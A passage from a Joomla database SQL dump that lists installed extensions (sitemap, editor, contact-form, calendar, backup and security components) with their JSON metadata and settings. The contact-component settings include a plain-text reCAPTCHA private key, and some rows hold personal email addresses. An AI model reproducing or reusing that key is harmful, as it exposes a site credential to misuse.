Analytics','plugin','ibanalytics','system',0,0,1,0,'{\"legacy\":false,\"name\":\"System - iBualoy Analytics\",\"type\":\"plugin\",\"creationDate\":\"28 May 2011\",\"author\":\"iBualoy\",\"copyright\":\"(C) 2011 iBualoy. All rights reserved.\",\"authorEmail\":\"sexdrum@gmail.com\",\"authorUrl\":\"www.ibualoy.net\",\"version\":\"1.6.1\",\"description\":\"This iBualoy Analytics is a simple plugin to integrate latest Google Analytics Javascript into the html header in your website according to Google\'s Guideline.\",\"group\":\"\"}','{\"web_property_id\":\"\",\"position\":\"header\"}','','',0,'0000-00-00 00:00:00',0,0),(10007,'PLG_SYSTEM_NONUMBERELEMENTS','plugin','nonumberelements','system',0,1,1,0,'{\"legacy\":true,\"name\":\"PLG_SYSTEM_NONUMBERELEMENTS\",\"type\":\"plugin\",\"creationDate\":\"July 2011\",\"author\":\"NoNumber! (Peter van Westen)\",\"copyright\":\"Copyright \\u00a9 2011 NoNumber! All Rights Reserved\",\"authorEmail\":\"peter@nonumber.nl\",\"authorUrl\":\"http:\\/\\/www.nonumber.nl\",\"version\":\"2.8.4\",\"description\":\"PLG_SYSTEM_NONUMBERELEMENTS_DESC\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10008,'plg_editors_jce','plugin','jce','editors',0,1,1,0,'{\"name\":\"plg_editors_jce\",\"type\":\"plugin\",\"creationDate\":\"27 March 2013\",\"author\":\"Ryan Demmer\",\"copyright\":\"2006-2010 Ryan Demmer\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"http:\\/\\/www.joomlacontenteditor.net\",\"version\":\"2.3.2.4\",\"description\":\"WF_EDITOR_PLUGIN_DESC\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10009,'jce','component','com_jce','',1,1,0,0,'{\"name\":\"JCE\",\"type\":\"component\",\"creationDate\":\"27 March 2013\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2013 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"www.joomlacontenteditor.net\",\"version\":\"2.3.2.4\",\"description\":\"WF_ADMIN_DESC\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10013,'com_xmap','component','com_xmap','',1,1,0,0,'{\"name\":\"com_xmap\",\"type\":\"component\",\"creationDate\":\"2011-04-10\",\"author\":\"Guillermo Vargas\",\"copyright\":\"This component is released under the GNU\\/GPL License\",\"authorEmail\":\"guille@vargas.co.cr\",\"authorUrl\":\"http:\\/\\/joomla.vargas.co.cr\",\"version\":\"2.3.3\",\"description\":\"Xmap - Sitemap Generator for Joomla!\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10014,'Xmap - Content Plugin','plugin','com_content','xmap',0,0,1,0,'{\"name\":\"Xmap - Content Plugin\",\"type\":\"plugin\",\"creationDate\":\"01\\/26\\/2011\",\"author\":\"Guillermo Vargas\",\"copyright\":\"GNU GPL\",\"authorEmail\":\"guille@vargas.co.cr\",\"authorUrl\":\"joomla.vargas.co.cr\",\"version\":\"2.0.4\",\"description\":\"XMAP_CONTENT_PLUGIN_DESCRIPTION\",\"group\":\"\"}','{\"expand_categories\":\"1\",\"expand_featured\":\"1\",\"include_archived\":\"2\",\"show_unauth\":\"0\",\"add_pagebreaks\":\"1\",\"max_art\":\"0\",\"max_art_age\":\"0\",\"add_images\":\"0\",\"cat_priority\":\"-1\",\"cat_changefreq\":\"-1\",\"art_priority\":\"-1\",\"art_changefreq\":\"-1\",\"keywords\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(10015,'Xmap - Kunena Plugin','plugin','com_kunena','xmap',0,0,1,0,'{\"name\":\"Xmap - Kunena Plugin\",\"type\":\"plugin\",\"creationDate\":\"September 2007\",\"author\":\"Guillermo Vargas\",\"copyright\":\"GNU GPL\",\"authorEmail\":\"guille@vargas.co.cr\",\"authorUrl\":\"joomla.vargas.co.cr\",\"version\":\"2.0.3\",\"description\":\"Xmap Plugin for Kunena component\",\"group\":\"\"}','{\"include_topics\":\"1\",\"max_topics\":\"\",\"max_age\":\"\",\"cat_priority\":\"-1\",\"cat_changefreq\":\"-1\",\"topic_priority\":\"-1\",\"topic_changefreq\":\"-1\"}','','',0,'0000-00-00 00:00:00',0,0),(10016,'Xmap - SobiPro Plugin','plugin','com_sobipro','xmap',0,0,1,0,'{\"name\":\"Xmap - SobiPro Plugin\",\"type\":\"plugin\",\"creationDate\":\"07\\/15\\/2011\",\"author\":\"Guillermo Vargas\",\"copyright\":\"GNU GPL\",\"authorEmail\":\"guille@vargas.co.cr\",\"authorUrl\":\"joomla.vargas.co.cr\",\"version\":\"2.0.2\",\"description\":\"Xmap Plugin for SobiPro component\",\"group\":\"\"}','{\"include_entries\":\"1\",\"max_entries\":\"\",\"max_age\":\"\",\"entries_order\":\"a.ordering\",\"entries_orderdir\":\"DESC\",\"cat_priority\":\"-1\",\"cat_changefreq\":\"weekly\",\"entry_priority\":\"-1\",\"entry_changefreq\":\"weekly\"}','','',0,'0000-00-00 00:00:00',0,0),(10017,'Xmap - Mosets Tree Plugin','plugin','com_mtree','xmap',0,0,1,0,'{\"name\":\"Xmap - Mosets Tree Plugin\",\"type\":\"plugin\",\"creationDate\":\"07\\/20\\/2011\",\"author\":\"Guillermo Vargas\",\"copyright\":\"GNU GPL\",\"authorEmail\":\"guille@vargas.co.cr\",\"authorUrl\":\"joomla.vargas.co.cr\",\"version\":\"2.0.2\",\"description\":\"XMAP_MTREE_PLUGIN_DESCRIPTION\",\"group\":\"\"}','{\"cats_order\":\"cat_name\",\"cats_orderdir\":\"ASC\",\"include_links\":\"1\",\"links_order\":\"ordering\",\"entries_orderdir\":\"ASC\",\"max_links\":\"\",\"max_age\":\"\",\"cat_priority\":\"0.5\",\"cat_changefreq\":\"weekly\",\"link_priority\":\"0.5\",\"link_changefreq\":\"weekly\"}','','',0,'0000-00-00 00:00:00',0,0),(10018,'Xmap - Virtuemart Plugin','plugin','com_virtuemart','xmap',0,0,1,0,'{\"name\":\"Xmap - Virtuemart Plugin\",\"type\":\"plugin\",\"creationDate\":\"January 2012\",\"author\":\"Guillermo Vargas\",\"copyright\":\"GNU GPL\",\"authorEmail\":\"guille@vargas.co.cr\",\"authorUrl\":\"joomla.vargas.co.cr\",\"version\":\"2.0.1\",\"description\":\"XMAP_VM_PLUGIN_DESCRIPTION\",\"group\":\"\"}','{\"include_products\":\"1\",\"cat_priority\":\"-1\",\"cat_changefreq\":\"-1\",\"prod_priority\":\"-1\",\"prod_changefreq\":\"-1\"}','','',0,'0000-00-00 00:00:00',0,0),(10019,'Xmap - WebLinks Plugin','plugin','com_weblinks','xmap',0,0,1,0,'{\"name\":\"Xmap - WebLinks Plugin\",\"type\":\"plugin\",\"creationDate\":\"Apr 2004\",\"author\":\"Guillermo Vargas\",\"copyright\":\"GNU GPL\",\"authorEmail\":\"guille@vargas.co.cr\",\"authorUrl\":\"joomla.vargas.co.cr\",\"version\":\"2.0.1\",\"description\":\"XMAP_WL_PLUGIN_DESCRIPTION\",\"group\":\"\"}','{\"include_links\":\"1\",\"max_links\":\"\",\"cat_priority\":\"-1\",\"cat_changefreq\":\"-1\",\"link_priority\":\"-1\",\"link_changefreq\":\"-1\"}','','',0,'0000-00-00 00:00:00',0,0),(10020,'xmap','package','pkg_xmap','',0,1,1,0,'{\"name\":\"Xmap Package\",\"type\":\"package\",\"creationDate\":\"Unknown\",\"author\":\"Unknown\",\"copyright\":\"\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"2.3.3\",\"description\":\"The Site Map generator for Joomla!\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10021,'HH1','template','hh1','',0,1,1,0,'{\"legacy\":false,\"name\":\"HH1\",\"type\":\"template\",\"creationDate\":\"2013-05-17\",\"author\":\"Unknown\",\"copyright\":\"\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"1.0\",\"description\":\"Artisteer-generated theme\",\"group\":\"\"}','[]','','',0,'0000-00-00 00:00:00',0,0),(10022,'ImageSlideShow','module','mod_briaskISS','',0,1,0,0,'{\"legacy\":false,\"name\":\"ImageSlideShow\",\"type\":\"module\",\"creationDate\":\"March 2008\",\"author\":\"Briask\",\"copyright\":\"\",\"authorEmail\":\"briask@briask.com\",\"authorUrl\":\"http:\\/\\/www.briask.com\",\"version\":\"1.1\",\"description\":\"A rotating image slideshow module. Note for ImageSlideShow to resize and display images it create a sub-directory called briaskthumbs. Delete this directory if changes are made to affect the thumbnails.\",\"group\":\"\"}','{\"moduleclass_sfx\":\"\",\"Directory\":\"images\\/sampledata\\/parks\\/animals\",\"pxHeight\":\"200\",\"pxWidth\":\"200\",\"transDelay\":\"50\",\"nextDelay\":\"15000\",\"Title\":\"An Image Slideshow\",\"URL\":\"http:\\/\\/www.joomla.org\",\"EnableLink\":\"0\",\"Sequence\":\"0\",\"Resize\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10023,'isis','template','isis','',1,1,1,0,'{\"name\":\"isis\",\"type\":\"template\",\"creationDate\":\"3\\/30\\/2012\",\"author\":\"Kyle Ledbetter\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"\",\"version\":\"1.0\",\"description\":\"TPL_ISIS_XML_DESCRIPTION\",\"group\":\"\"}','{\"templateColor\":\"\",\"logoFile\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(10024,'protostar','template','protostar','',0,1,1,0,'{\"name\":\"protostar\",\"type\":\"template\",\"creationDate\":\"4\\/30\\/2012\",\"author\":\"Kyle Ledbetter\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"\",\"version\":\"1.0\",\"description\":\"TPL_PROTOSTAR_XML_DESCRIPTION\",\"group\":\"\"}','{\"templateColor\":\"\",\"logoFile\":\"\",\"googleFont\":\"1\",\"googleFontName\":\"Open+Sans\",\"fluidContainer\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10025,'beez3','template','beez3','',0,1,1,0,'{\"name\":\"beez3\",\"type\":\"template\",\"creationDate\":\"25 November 2009\",\"author\":\"Angie Radtke\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"a.radtke@derauftritt.de\",\"authorUrl\":\"http:\\/\\/www.der-auftritt.de\",\"version\":\"3.1.0\",\"description\":\"TPL_BEEZ3_XML_DESCRIPTION\",\"group\":\"\"}','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"navposition\":\"center\",\"templatecolor\":\"nature\"}','','',0,'0000-00-00 00:00:00',0,0),(10026,'plg_quickicon_jcefilebrowser','plugin','jcefilebrowser','quickicon',0,1,1,0,'{\"name\":\"plg_quickicon_jcefilebrowser\",\"type\":\"plugin\",\"creationDate\":\"27 March 2013\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2013 Ryan Demmer. All rights reserved\",\"authorEmail\":\"@@email@@\",\"authorUrl\":\"www.joomalcontenteditor.net\",\"version\":\"2.3.2.4\",\"description\":\"PLG_QUICKICON_JCEFILEBROWSER_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10027,'Blank Module','module','mod_blank30v13','',0,1,0,0,'{\"name\":\"Blank Module\",\"type\":\"module\",\"creationDate\":\"March 2013\",\"author\":\"Bob Galway\",\"copyright\":\"Copyright Bob Galway. All rights reserved.\",\"authorEmail\":\"reply@blackdale.com\",\"authorUrl\":\"www.blackdale.com\",\"version\":\"3.3\",\"description\":\"BLANKMODULE30V13\",\"group\":\"\"}','{\"codeeditor\":\"\",\"textareause\":\"1\",\"phpcode\":\"\",\"phpuse\":\"1\",\"script\":\"\",\"scriptuse\":\"1\",\"itemid\":\"a\",\"contenttitleuse\":\"1\",\"contentuse\":\"1\",\"content1\":\"1\",\"content2\":\"2\",\"content3\":\"3\",\"graphics\":\"2\",\"keycolour\":\"grey\",\"surroundstyle\":\"06roundcorner5\",\"bgpattern\":\"herring\",\"bgautocolour\":\"1\",\"bgcustomcolour\":\"ffffff\",\"trans2\":\"1\",\"colour2\":\"\",\"custompx\":\"20\",\"margin-leftmodule\":\"\",\"paddingleft\":\"\",\"paddingright\":\"\",\"paddingtop\":\"\",\"paddingbottom\":\"\",\"margin-top\":\"\",\"margin-bottom\":\"\",\"width\":\"100\",\"widthunit\":\"%\",\"trans1\":\"1\",\"colour1\":\"\",\"moduleclass_sfx\":\"\",\"modno_bm\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10028,'com_alfcontact','component','com_alfcontact','',1,1,0,0,'{\"name\":\"COM_ALFCONTACT\",\"type\":\"component\",\"creationDate\":\"April 2013\",\"author\":\"Alfred Vink\",\"copyright\":\"Copyright \\u00a9 2013 - All rights reserved.\",\"authorEmail\":\"alfred@alfsoft.com\",\"authorUrl\":\"http:\\/\\/www.alfsoft.com\",\"version\":\"3.1.4\",\"description\":\"\",\"group\":\"\"}','{\"maxchars\":\"\",\"autouser\":\"1\",\"fromsite\":\"0\",\"captcha\":\"2\",\"captchatype\":\"0\",\"copytome\":\"1\",\"resetbtn\":\"1\",\"verbose\":\"1\",\"mailformat\":\"1\",\"publickey\":\"6LcQXOISAAAAADzdI4nVv0canu5dKnp_Erp3_MMx\",\"privatekey\":\"6LcQXOISAAAAALh5KQC8UFVeI7KwRO_uWI2fxOvn\",\"captchatheme\":\"clean\",\"captchalng\":\"en\",\"captchas_user\":\"\",\"captchas_key\":\"\",\"captchas_alphabet\":\"\",\"captchas_chars\":\"\",\"captchas_width\":\"\",\"captchas_height\":\"\",\"captchas_color\":\"\",\"captchas_audiolink\":\"0\",\"captchas_audiolng\":\"en\",\"redirect_option\":\"3\",\"custom_header\":\"\",\"custom_text\":\"Your message has been successfully sent!\"}','','',0,'0000-00-00 00:00:00',0,0),(10029,'Rapid Contact','module','mod_rapid_contact','',0,1,0,0,'{\"name\":\"Rapid Contact\",\"type\":\"module\",\"creationDate\":\"March 2011\",\"author\":\"Christopher Mavros\",\"copyright\":\"Copyright (C) 2009-2011 Christopher Mavros. All rights reserved.\",\"authorEmail\":\"mavrosxristoforos@gmail.com\",\"authorUrl\":\"http:\\/\\/www.mavrosxristoforos.com\\/\",\"version\":\"1.2\",\"description\":\"Rapid Contact. Lightweight, fast and easy, configuring a contact form, was never a pleasure before.\",\"group\":\"\"}','{\"email_recipient\":\"email@email.com\",\"from_name\":\"Rapid Contact\",\"from_email\":\"rapid_contact@yoursite.com\",\"email_label\":\"Email:\",\"subject_label\":\"Subject:\",\"message_label\":\"Message:\",\"button_text\":\"Send Message\",\"page_text\":\"Thank you for your contact.\",\"error_text\":\"Your message could not be sent. Please try again.\",\"no_email\":\"Please write your email\",\"invalid_email\":\"Please write a valid email\",\"wrong_antispam\":\"Wrong Anti-Spam Answer\",\"pre_text\":\"\",\"thank_text_color\":\"#FF0000\",\"error_text_color\":\"#FF0000\",\"email_width\":\"15\",\"subject_width\":\"15\",\"message_width\":\"13\",\"button_width\":\"100\",\"label_pos\":\"0\",\"addcss\":\"div.rapid_contact tr, div.rapid_contact td { border: none; padding: 3px; }\",\"exact_url\":\"1\",\"disable_https\":\"1\",\"fixed_url\":\"0\",\"fixed_url_address\":\"\",\"enable_anti_spam\":\"1\",\"anti_spam_q\":\"How many eyes has a typical person?\",\"anti_spam_a\":\"2\",\"anti_spam_position\":\"0\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\"}','','',0,'0000-00-00 00:00:00',0,0),(10030,'Simple Email Form','module','mod_simpleemailform','',0,1,0,0,'{\"name\":\"Simple Email Form\",\"type\":\"module\",\"creationDate\":\"2013-05-22\",\"author\":\"unlikelysource.com\",\"copyright\":\"All rights reserved by unlikelysource.com (c) 2010 - 2013\",\"authorEmail\":\"info@unlikelysource.org\",\"authorUrl\":\"www.unlikelysource.com\",\"version\":\"1.8.2\",\"description\":\" \\n\\tA simple email form from unlikelysource.com with up to 8 fields + CAPTCHA + 26 languages. \\n\\t<br \\/>Version 1.8.2 -- works on Joomla 2.x and 3.x (1.8.1-1x supports Joomla 1.x)!\\n\\t<br \\/>REQUIRES a web server running at a minimum PHP 5.1!!!\\n\\t<br \\/>TO LOAD IN AN ARTICLE (most common): \\n\\t<ul><li>In the Details box, modify Position to user99 (or whatever). <\\/li>\\n\\t<li>In your target article, add this line: {loadposition user99}.<\\/li>\\n\\t<li>Make sure Extensions - Plugin Manager - Content - Load Module is active.<\\/li>\\n\\t<\\/ul>\\n\\t\",\"group\":\"\"}','{\"mod_simpleemailform_defaultLang\":\"en\",\"mod_simpleemailform_emailTo\":\"\",\"mod_simpleemailform_labelAlign\":\"L\",\"mod_simpleemailform_field1active\":\"R\",\"mod_simpleemailform_field1label\":\"From\",\"mod_simpleemailform_field1value\":\"\",\"mod_simpleemailform_field1size\":\"40\",\"mod_simpleemailform_field1maxx\":\"255\",\"mod_simpleemailform_field1from\":\"F\",\"mod_simpleemailform_field1ckRfmt\":\"C\",\"mod_simpleemailform_field1ckRpos\":\"B\",\"mod_simpleemailform_field2active\":\"R\",\"mod_simpleemailform_field2label\":\"Subject\",\"mod_simpleemailform_field2value\":\"Subject\",\"mod_simpleemailform_field2size\":\"40\",\"mod_simpleemailform_field2maxx\":\"255\",\"mod_simpleemailform_field2from\":\"S\",\"mod_simpleemailform_field2ckRfmt\":\"C\",\"mod_simpleemailform_field2ckRpos\":\"B\",\"mod_simpleemailform_field3active\":\"N\",\"mod_simpleemailform_field3label\":\"Field 3\",\"mod_simpleemailform_field3value\":\"Value 3\",\"mod_simpleemailform_field3size\":\"40\",\"mod_simpleemailform_field3maxx\":\"255\",\"mod_simpleemailform_field3from\":\"N\",\"mod_simpleemailform_field3ckRfmt\":\"C\",\"mod_simpleemailform_field3ckRpos\":\"B\",\"mod_simpleemailform_field4active\":\"N\",\"mod_simpleemailform_field4label\":\"Field 4\",\"mod_simpleemailform_field4value\":\"Value 4\",\"mod_simpleemailform_field4size\":\"40\",\"mod_simpleemailform_field4maxx\":\"255\",\"mod_simpleemailform_field4from\":\"N\",\"mod_simpleemailform_field4ckRfmt\":\"C\",\"mod_simpleemailform_field4ckRpos\":\"B\",\"mod_simpleemailform_field5active\":\"N\",\"mod_simpleemailform_field5label\":\"Field 5\",\"mod_simpleemailform_field5value\":\"Value 5\",\"mod_simpleemailform_field5size\":\"40\",\"mod_simpleemailform_field5maxx\":\"255\",\"mod_simpleemailform_field5from\":\"N\",\"mod_simpleemailform_field5ckRfmt\":\"C\",\"mod_simpleemailform_field5ckRpos\":\"B\",\"mod_simpleemailform_field6active\":\"N\",\"mod_simpleemailform_field6label\":\"Field 6\",\"mod_simpleemailform_field6value\":\"Value 6\",\"mod_simpleemailform_field6size\":\"40\",\"mod_simpleemailform_field6maxx\":\"255\",\"mod_simpleemailform_field6from\":\"N\",\"mod_simpleemailform_field6ckRfmt\":\"C\",\"mod_simpleemailform_field6ckRpos\":\"B\",\"mod_simpleemailform_field7active\":\"N\",\"mod_simpleemailform_field7label\":\"Field 7\",\"mod_simpleemailform_field7value\":\"Value 7\",\"mod_simpleemailform_field7size\":\"40\",\"mod_simpleemailform_field7maxx\":\"255\",\"mod_simpleemailform_field7from\":\"N\",\"mod_simpleemailform_field7ckRfmt\":\"C\",\"mod_simpleemailform_field7ckRpos\":\"B\",\"mod_simpleemailform_field8active\":\"N\",\"mod_simpleemailform_field8label\":\"Field 8\",\"mod_simpleemailform_field8value\":\"Value 8\",\"mod_simpleemailform_field8size\":\"40\",\"mod_simpleemailform_field8maxx\":\"255\",\"mod_simpleemailform_field8from\":\"N\",\"mod_simpleemailform_field8ckRfmt\":\"C\",\"mod_simpleemailform_field8ckRpos\":\"B\",\"cache\":\"0\",\"mod_simpleemailform_instance\":\"1\",\"mod_simpleemailform_emailCC\":\"\",\"mod_simpleemailform_emailBCC\":\"\",\"mod_simpleemailform_emailReplyTo\":\"\",\"mod_simpleemailform_replytoActive\":\"N\",\"mod_simpleemailform_autoreset\":\"N\",\"mod_simpleemailform_cssClass\":\"mod_sef\",\"mod_simpleemailform_col2space\":\"5\",\"mod_simpleemailform_redirectURL\":\"\",\"mod_simpleemailform_useCaptcha\":\"N\",\"mod_simpleemailform_captchaDir\":\"\",\"mod_simpleemailform_captchaURL\":\"\",\"mod_simpleemailform_captchaLen\":\"8\",\"mod_simpleemailform_captchaSize\":\"24\",\"mod_simpleemailform_captchaWidth\":\"200\",\"mod_simpleemailform_captchaHeight\":\"80\",\"mod_simpleemailform_captchaTxtColor\":\"#000000\",\"mod_simpleemailform_captchaLinesColor\":\"#FFFF00\",\"mod_simpleemailform_captchaBgColor\":\"#BFBFBF\",\"mod_simpleemailform_errorTxtColor\":\"red\",\"mod_simpleemailform_successTxtColor\":\"green\",\"mod_simpleemailform_anchor\":\"#\",\"mod_simpleemailform_uploadActive\":\"0\",\"mod_simpleemailform_uploadLabel\":\"Attachment\",\"mod_simpleemailform_uploadAllowed\":\"\",\"mod_simpleemailform_emailFile\":\"\",\"mod_simpleemailform_copymeLabel\":\"Send me a copy\",\"mod_simpleemailform_copymeActive\":\"N\",\"mod_simpleemailform_copymeAuto\":\"N\",\"mod_simpleemailform_emailCheck\":\"Y\",\"mod_simpleemailform_testMode\":\"N\"}','','',0,'0000-00-00 00:00:00',0,0),(10031,'HH2','template','hh2','',0,1,1,0,'{\"name\":\"HH2\",\"type\":\"template\",\"creationDate\":\"2013-06-10\",\"author\":\"Unknown\",\"copyright\":\"\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"1.0\",\"description\":\"Artisteer-generated theme\",\"group\":\"\"}','[]','','',0,'0000-00-00 00:00:00',0,0),(10032,'PLG_AUTHENTICATION_LOGINFAILEDLOG','plugin','loginfailedlog','authentication',0,1,1,0,'{\"name\":\"PLG_AUTHENTICATION_LOGINFAILEDLOG\",\"type\":\"plugin\",\"creationDate\":\"June 2011\",\"author\":\"JM-experts\",\"copyright\":\"Copyright (C) 2006 - 2011 Open Source Matters. All rights reserved.\",\"authorEmail\":\"info@jm-experts.com\",\"authorUrl\":\"www.jm-exprerts.com\",\"version\":\"1.5.6\",\"description\":\"PLG_AUTHENTICATION_LOGINFAILEDLOG_XML_DESCRIPTION\",\"group\":\"\"}','{\"emailtype\":\"1\",\"savepass\":\"no\",\"emailtype2\":\"2\",\"email2\":\"richardtibang@gmail.com\",\"userIDs\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10042,'XMAP_PLUGIN_K2','plugin','com_k2','xmap',0,0,1,0,'{\"name\":\"XMAP_PLUGIN_K2\",\"type\":\"plugin\",\"creationDate\":\"November 2011\",\"author\":\"Mohammad Hasani Eghtedar\",\"copyright\":\"GNU GPL\",\"authorEmail\":\"m.h.eghtedar@gmail.com\",\"authorUrl\":\"https:\\/\\/github.com\\/mhehm\\/Xmap\",\"version\":\"1.3\",\"description\":\"XMAP_PLUGIN_K2_DESC\",\"group\":\"\"}','{\"subcategories\":\"no\",\"showk2items\":\"always\",\"suppressdups\":\"no\",\"priority\":\"0.5\",\"changefreq\":\"weekly\"}','','',0,'0000-00-00 00:00:00',0,0),(10043,'com_simplecalendar','component','com_simplecalendar','',1,1,0,0,'{\"name\":\"com_simplecalendar\",\"type\":\"component\",\"creationDate\":\"July 7, 2013\",\"author\":\"Fabrizio Albonico\",\"copyright\":\"(C) 2009 - 2013 Fabrizio Albonico. All rights reserved.\",\"authorEmail\":\"software@albonico.ch\",\"authorUrl\":\"software.albonico.ch\",\"version\":\"3.0.6\",\"description\":\"COM_SIMPLECALENDAR_XML_DESCRIPTION\",\"group\":\"\"}','{\"backend_list_date_format\":\"d F Y\",\"date_short_format\":\"d.m\",\"date_long_format\":\"m\\/d\\/Y\",\"time_format\":\"H:i\",\"use_24h\":\"1\",\"minute_split\":\"4\",\"vcal_encoding\":\"UTF-8\",\"list_style\":\"list\",\"period\":\"1\",\"sort\":\"asc\",\"show_pagination\":\"2\",\"show_pagination_limit\":\"0\",\"show_pagination_results\":\"1\",\"filter_field\":\"hide\",\"frontend_link_color\":\"B8CDDC\",\"intro_text\":\"\",\"show_headers\":\"1\",\"customfield1_label\":\"\",\"customfield2_label\":\"\",\"currency\":\"$\",\"show_print_icon_list\":\"1\",\"show_vcal_icon_list\":\"1\",\"columns\":\"[{\\\"colname\\\":\\\"name\\\",\\\"cssclass\\\":\\\"\\\",\\\"style\\\":\\\"\\\",\\\"caption\\\":\\\"Name\\\"},{\\\"colname\\\":\\\"venue\\\",\\\"cssclass\\\":\\\"hidden-phone\\\",\\\"style\\\":\\\"\\\",\\\"caption\\\":\\\"Venue\\\"},{\\\"colname\\\":\\\"date\\\",\\\"cssclass\\\":\\\"\\\",\\\"style\\\":\\\"\\\",\\\"caption\\\":\\\"Date\\\"}]\",\"show_info_container\":\"1\",\"show_category\":\"1\",\"show_created\":\"0\",\"show_modified\":\"0\",\"show_username\":\"0\",\"show_hits\":\"0\",\"show_social_buttons\":\"0\",\"show_twitter\":\"1\",\"show_gplus\":\"1\",\"show_facebook\":\"1\",\"show_print_icon\":\"1\",\"show_mail_icon\":\"1\",\"show_vcal_icon\":\"1\",\"use_gmap\":\"1\",\"gmap_std_latlon\":\"46,9\",\"gmap_zoom\":\"12\",\"use_frontend_submission_email\":\"0\",\"send_notifications_to\":\"\",\"frontend_approve\":\"0\",\"captcha\":\"\",\"validation_key_domain\":\"\",\"validation_key\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(10044,'mod_simplecalendar','module','mod_simplecalendar','',0,1,0,0,'{\"name\":\"mod_simplecalendar\",\"type\":\"module\",\"creationDate\":\"July 07, 2013\",\"author\":\"FA Software\",\"copyright\":\"(c) 2009-2013 FA Software - Fabrizio Albonico\",\"authorEmail\":\"software@albonico.ch\",\"authorUrl\":\"http:\\/\\/software.albonico.ch\",\"version\":\"3.0.1\",\"description\":\"MOD_SIMPLECALENDAR_XML_DESC\",\"group\":\"\"}','{\"count\":\"5\",\"fields\":\"{NAME}, {VENUE} ({START_DATE})\",\"show_link\":\"1\",\"period\":\"1\",\"sort\":\"1\",\"date_format\":\"d.m.Y\",\"time_format\":\"H:i\",\"moduleclass_sfx\":\"\",\"catid\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(10045,'xcloner-backupandrestore','component','com_xcloner-backupandrestore','',1,1,0,0,'{\"name\":\"XCloner-BackupandRestore\",\"type\":\"component\",\"creationDate\":\"May 2013\",\"author\":\"XCloner.com\",\"copyright\":\"XCloner.com\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"3.4\",\"description\":\"\\n <h2>XCloner Backup&Restore Utility<\\/h2>\\n <pre>XCloner is a tool that will help you manage your website backups, generate\\/restore\\/move so your website will be always secured!\\n\\t <a href=\\\"http:\\/\\/www.xcloner.com\\\"><img src=\\\"http:\\/\\/www.xcloner.com\\/xcloner_p.jpg\\\" border=0 style=\\\"float:left; padding-right:10px;padding-bottom: 100px;padding-top:20px;\\\"><\\/a>\\n Features:\\n -cron script to generate backup\\n -multiple backup options\\n -restore tool to move the website rapidly to other locations\\n -multiple locations of where you could store the backup safelly\\n -comnpatible with all versions of Joomla\\n\\n For reports and suggestions please contact us at info@xcloner.com or visit us on <a href=\'http:\\/\\/www.xcloner.com\'>http:\\/\\/www.xcloner.com<\\/a>\\n <\\/pre>\\n <br\\/>\\n\\n XCloner.com © 2006-2013 | <a href=\\\"http:\\/\\/www.xcloner.com\\\">www.xcloner.com<\\/a>\\n <br\\/><p\\/><br\\/>\\n\\t\\n \",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10046,'admintools','component','com_admintools','',1,1,0,0,'{\"name\":\"Admintools\",\"type\":\"component\",\"creationDate\":\"2013-11-21\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2010 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"2.5.10\",\"description\":\"Security and utilitarian tools for Joomla! site 